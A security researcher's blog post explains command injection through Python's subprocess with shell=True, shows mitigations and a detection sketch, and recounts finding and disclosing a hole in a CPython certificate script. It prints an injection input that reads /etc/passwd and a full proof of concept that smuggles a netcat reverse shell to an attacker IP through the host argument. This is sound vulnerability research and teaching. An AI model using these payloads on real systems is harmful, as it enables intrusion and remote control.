Getting Arbitrary Code Execution In a Python Script

UPDATE (November 2022): After much discussion, the security team at Python has decided to remove the script described below. As such, some of the links to the script (github) will no longer work. I am happy to see a mitigation for this vulnerability.

December 31. New Year’s Eve. Not so long ago. A time of reflection and new beginnings. Learning from our mistakes, charting the course for the future year, and celebrating successes. Marveling at our good — or bad — luck. Contemplative. What goals will I set for myself? What will I focus on this year? What do I want to improve?

For me, the goal was to get a CVE to my name — Not for any particular reason other than that the idea had lingered far too long in the back of my mind, and the time seemed right to focus on such a task. I dutifully jotted my goal down. Then promptly forgot about it. Until August.

In August I was reading the GitHub repo of a small open source project. A Python project that a friend referred me to. It was part of the enormous wave of security tools that crashes upon the community, hoping that, in the frothy aftermath, it would get taken up by a few members and not pulled back to the abyss by the rip current.

The Vulnerability

That is where I saw it. A call to Python’s subprocess library. Direct system call with shell enabled (shell=True). That seems dangerous, I thought to myself, and started investigating.

I spent the next few evenings poring over the Python subprocess documentation, Google searching for patterns (limiting my search to github.com just for ease), and reading the code of various projects. A pattern emerged with the use of this library. Though it can be vulnerable, many of its uses are constructed in just the right way to avoid command injection. Common methods appear to be the use of temp files (i.e. randomized file names) and the severe restriction of user-defined input (this is good). But there are some, as there always are (and knowing this, my interest was piqued), who do not follow these conventions, and that leads to vulnerability, as I will describe below.

Though the subprocess functions can make unrestricted system-level calls (e.g. “ls”, “pwd”, etc.), the Python language tries to limit the “direct” calls by setting the “shell” parameter to False by default. This limits execution to the given executable (the first argument in the list). An example:

import subprocess
subprocess.Popen(['ls', '-al'])

Note that there is no ‘shell’ argument in the above Popen call. Essentially, shell=False. When shell=False the subprocess functions take a list of arguments: the executable, then any parameters for that executable. Using this method, if you wanted to execute (in bash):

ls -al > test.out

You would have to use the stdout argument of the call and open a file:

with open("test.out","wb") as f:
    subprocess.Popen(['ls', '-al'], stdout=f)

OR… you can just make the call a string and set shell=True (passing this string with shell=False raises a ‘FileNotFoundError’, because Python then looks for an executable literally named “ls -al > test.out”):

subprocess.Popen("ls -al > test.out", shell=True)

The ‘string method’ above looks a lot easier and better represents what the developer is trying to do (it is the actual bash command after all!). Unfortunately it can be dangerous. It may seem harmless until you get to more advanced calls — that may require user input. Here is a trivial example derived from the example above. It simply saves the ‘ls -al’ output to a given filename:

usr_inp = input("Enter filename: ")
cmd = "ls -al > %s" % str(usr_inp)
subprocess.Popen(cmd, shell=True)

Expected use is for the user to enter a filename, then the system runs “ls -al > <filename>”:

> python3 basic_example.py
> Enter filename: 1.txt

But what if we enter some malicious data? Like…

> python3 basic_example.py
> Enter filename: 1.txt;cat /etc/passwd
> ... Oh my...

This is a simple command injection vulnerability. Obviously this is a trivial example, but this class of vulnerability, with user-defined input (even filenames) leading to command injection, is still prevalent in systems.
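The difference is easiest to see in the command string itself. What follows is a minimal sketch, not a definitive fix: the function names are hypothetical and only illustrate two common mitigations, quoting the input with shlex.quote or skipping the shell entirely.

```python
import shlex
import subprocess


def vulnerable_cmd(filename):
    # Same construction as the example above: the input lands in the shell string as-is.
    return "ls -al > %s" % filename


def quoted_cmd(filename):
    # shlex.quote wraps the value so a POSIX shell treats it as one literal word.
    return "ls -al > %s" % shlex.quote(filename)


def list_directory_to_file(filename):
    # No shell at all: Python opens the file, and 'ls' only ever sees its own arguments.
    with open(filename, "wb") as f:
        return subprocess.run(["ls", "-al"], stdout=f).returncode


payload = "1.txt;cat /etc/passwd"
print(vulnerable_cmd(payload))  # ls -al > 1.txt;cat /etc/passwd
print(quoted_cmd(payload))      # ls -al > '1.txt;cat /etc/passwd'
```

In the quoted version the shell would write to a single (oddly named) file instead of running a second command. The list version avoids the question altogether, which is usually the simpler choice when the redirect can be done in Python.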

It must be said that this can happen while using the ‘list’ approach above too. If the developer takes user input and simply calls a shell to execute it then we will see the same vulnerability:

usr_inp = input("Enter command: ")
subprocess.Popen(['/bin/bash', '-c', str(usr_inp)])

This is essentially what is happening behind the scenes when the shell=True argument is set. The developer is simply doing that step instead. No shell=True required. This means that it is not enough to simply search for shell=True, but to inspect HOW the call is being made and how the command is being constructed to ensure that the code is not vulnerable to command injection. As always, the responsibility falls to the developer to understand the call that they are making and the potential issues with such calls.
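To look for both patterns at once, a rough heuristic can walk the syntax tree instead of grepping for a string. The sketch below is an assumption of mine and not a tool used in this research: find_shell_calls and the SHELLS set are hypothetical, and it only catches literal shell=True keywords and list literals that start with a shell and '-c'. Anything it flags still needs a human to check how the command is built.

```python
import ast

# Hypothetical, incomplete set of shell names to look for.
SHELLS = {"sh", "bash", "/bin/sh", "/bin/bash"}


def find_shell_calls(source):
    """Return sorted (line, reason) pairs for calls that hand a command to a shell."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        # Pattern 1: any call carrying the literal keyword argument shell=True.
        for kw in node.keywords:
            if (kw.arg == "shell" and isinstance(kw.value, ast.Constant)
                    and kw.value.value is True):
                findings.append((node.lineno, "shell=True"))
        # Pattern 2: a list literal as first argument that begins with a shell and '-c'.
        if node.args and isinstance(node.args[0], ast.List):
            literals = [e.value for e in node.args[0].elts[:2]
                        if isinstance(e, ast.Constant)]
            if len(literals) == 2 and literals[0] in SHELLS and literals[1] == "-c":
                findings.append((node.lineno, "explicit shell -c"))
    return sorted(findings)


sample = '''
import subprocess
subprocess.Popen(cmd, shell=True)
subprocess.Popen(['/bin/bash', '-c', user_input])
subprocess.Popen(['ls', '-al'])
'''
print(find_shell_calls(sample))  # [(3, 'shell=True'), (4, 'explicit shell -c')]
```

This misses plenty (os.system, a shell flag passed through a variable, commands assembled elsewhere), so it is a starting point for review rather than a verdict.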

So where does this leave us?
We now know about this type of vulnerability, but what can we do with it?

At this point, I had researched the class of vulnerability, played around with simple examples of sandboxed command injection to ensure I was on the right track, but the initial project I was inspecting was using the call properly. My next step was to start searching for other uses of shell=True (wouldn’t get all of the vulnerabilities but seemed like a good place to start). Google is your friend in this regard, and knowing the Google keywords such as “site:”, etc. helps.

This approach yielded fruit. In a CPython script of all things.

Buried within the CPython github repository is a Python script to pull down remote certificates. A sysadmin or advanced user would manually execute this script with a url/host and port, and the script would go there, and pull down the cert (PEM). Or. They would place it in their pipeline of scripts to be executed automatically.

The standard call would look something like this:

python3 get-remote-certificate.py host:port

Now there are some things to consider thus far:

The script must be run manually or as part of a pipeline. Lowers attack probability: -1 to probability.
If in a pipeline that ingests a list of URLs for certs, this limits the visibility of the attack: +1 to evasion.
The script is niche. Lowers attack probability: -1 to probability.
The nature of the script is such that it will most likely be run with sudo privileges. Increases attack impact: +2 to impact (would be arbitrary code execution AND privesc).
The attack vector would have to be either a phish (Convince a sysadmin that this is the cert URL) or cert url list poisoning.

The Attack

I found that, given a malicious host parameter, I could achieve code execution and get a reverse shell on the target host:

[Attack Box (192.168.0.121)] > nc -nvlp 9999

[TARGET] > python3 get-remote-certificate.py "somelegitlookingurl.com/withsomeextra/saltforgoodmeasure/?URI=f2ca1bb6c7e907d06dafe4687e579fce76b37e4e93b7605022da52e6ccc26fd2?makeitlookgood=\"; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.121 9999 >/tmp/f & #":9999

So there is a lot going on here. First, there is the python call to the script “python3 get-remote-certificate.py”, then we have the host — which is a long string for an obfuscated URL (malicious payload as well) — then we have the port.

Let’s unpack the host parameter.

The wrapping double quotes of the host parameter
The double quotes are important as we want the spaces preserved in the host parameter

somelegitlookingurl.com/withsomeextra/saltforgoodmeasure/?URI=f2ca1bb6c7e907d06dafe4687e579fce76b37e4e93b7605022da52e6ccc26fd2?makeitlookgood=
This is the long obfuscation. It could have simply been nothing, but I went for a realistic url to try to fool an overworked sysadmin.

\";
This is the crux. It terminates the string (\") and first command (;). Now I can run my own command. Which is what I do next.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.121 9999 >/tmp/f & #
A classic reverse shell. Nothing fancy. Make it a background process (&) and comment anything else after this (#).

So why does this work? Let’s look at the code:

The script defines a function called ‘subproc’ that takes a command. This function then calls the subprocess.Popen Python function with shell=True. This in itself is not vulnerable. What we need is user-defined input being put in the command without sanitization.

Which is what we get here for Windows, and here for Linux-type systems.

Note how the Linux command is constructed:

'openssl s_client -connect "%s:%s" -showcerts < /dev/null' % (host, port)

See how the %s:%s is wrapped by double quotes? That is why my command injection attack needed the quote terminator (\") before the semicolon (;). The command is a constructed string, and the host parameter is sent to the string without any sanitization. This is a perfect candidate for command injection.
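The effect of that formatting can be reproduced without running anything. This is a minimal sketch under stated assumptions: the template is the line quoted above, the payload is a harmless echo, and safer_argv and is_plausible_host are hypothetical names of mine. It is not the patch I submitted.

```python
import re

TEMPLATE = 'openssl s_client -connect "%s:%s" -showcerts < /dev/null'


def vulnerable_command(host, port):
    # Mirrors the string construction quoted above.
    return TEMPLATE % (host, port)


def safer_argv(host, port):
    # Hypothetical alternative: an argument list meant for use without shell=True,
    # so the whole host:port value stays a single argument to openssl.
    return ["openssl", "s_client", "-connect", "%s:%s" % (host, port), "-showcerts"]


def is_plausible_host(host):
    # Hypothetical allowlist check: letters, digits, dots and hyphens only.
    return re.fullmatch(r"[A-Za-z0-9.-]+", host) is not None


host = 'example.com"; echo INJECTED & #'
print(vulnerable_command(host, "9999"))
# openssl s_client -connect "example.com"; echo INJECTED & #:9999" -showcerts < /dev/null
print(safer_argv(host, "9999")[3])
# example.com"; echo INJECTED & #:9999
print(is_plausible_host(host), is_plausible_host("example.com"))
# False True
```

In the first output the injected quote closes the string early, the semicolon starts a new command, and the # comments out what is left of the template. With the argument list there is no shell to interpret any of it, and rejecting implausible hosts up front is a cheap second layer.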

The trick of this attack would be to somehow get the sysadmin to use the URL, or to poison a list of URLs with the malicious one. But if one were to achieve that, it would likely result in privileged arbitrary code execution (remote).

An interesting find.

Disclosure

I contacted Python at security@python.org with a full write-up, POC, and screenshots. Then waited.
While I waited, I submitted a CVE Request to MITRE (as I was now keenly aware of my New Year’s goal). I wrote a patch for the script and submitted a pull request for review. After a while, still with no response from Python, I followed up with them.

What transpired was a back-and-forth discussion about the attack surface, probability of attack, and the nature of the script. Triage. I have to admit, I was somewhat astonished at their approach. The level of inertia, the resistance to do anything, seemed high. Granted, this is no critical RCE in core Python libraries, but I was surprised by their lack of interest in fixing a clearly vulnerable script that could lead to privileged code execution. I even fixed it and submitted the pull request for them. From a ‘level of work’ perspective, this seemed like a clear ‘win’.

Now, I am not so naive as to think that “my discovery is the most important and must be addressed now”, and I am no stranger to red tape and due process, but the encounter left a bad taste in my mouth. Especially after the discussion, where one participant included the equivalent of “it works on my machine”, and they asked me to revoke my CVE request (with which I complied), or else they would contact MITRE and say it is invalid (though it clearly is not).

What was left was an unpatched vulnerability in a Python script, no CVE for me, and a rather bleak outlook on the responsible disclosure process. I have to admit, it does not encourage one to follow such a process in the future. This is an issue that we Blue-Teamers need to be concerned about. In any situation we need to consider what the environment favours. If it favours dropping 0-days on Twitter then that is what we should expect. We cannot make a process convoluted and frustrating and expect users to follow it. We’re better than this.

Caleb Shortt
